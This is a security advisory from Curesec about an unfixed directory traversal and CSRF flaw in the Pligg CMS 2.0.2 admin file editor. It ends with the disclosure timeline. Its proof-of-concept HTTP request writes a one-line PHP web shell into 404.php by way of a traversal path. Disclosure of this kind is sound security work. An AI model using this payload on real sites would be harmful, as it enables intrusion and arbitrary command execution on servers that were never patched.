Pligg CMS 2.0.2 CSRF / Code Execution
Posted on 31 October 2015
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Pligg CMS 2.0.2 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://pligg.com/ Vulnerability Type: Code Execution & CSRF Remote Exploitable: Yes Reported to vendor: 09/01/2015 Disclosed to public: 10/07/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description The file editor provides the possibility to edit .tpl files stored in the templates directory. But the file editor is vulnerable to directory traversal when saving files, and it does not check the submitted filename against a whitelist of allowed files. It also does not check the file extension. Because of this, it is possible to gain code execution. Admin credentials are required to access the file editor, but the request does not have CSRF protection, so an attacker can gain code execution by getting the admin to visit a website they control while logged in. 3. Proof of Concept POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1 the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/01/2015 Informed Vendor about Issue (no reply) 09/22/2015 Reminded Vendor of disclosure date 09/22/2015 Vendor replied, issue has been send to staff 09/29/2015 Reminded Vendor of disclosure date (no reply) 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html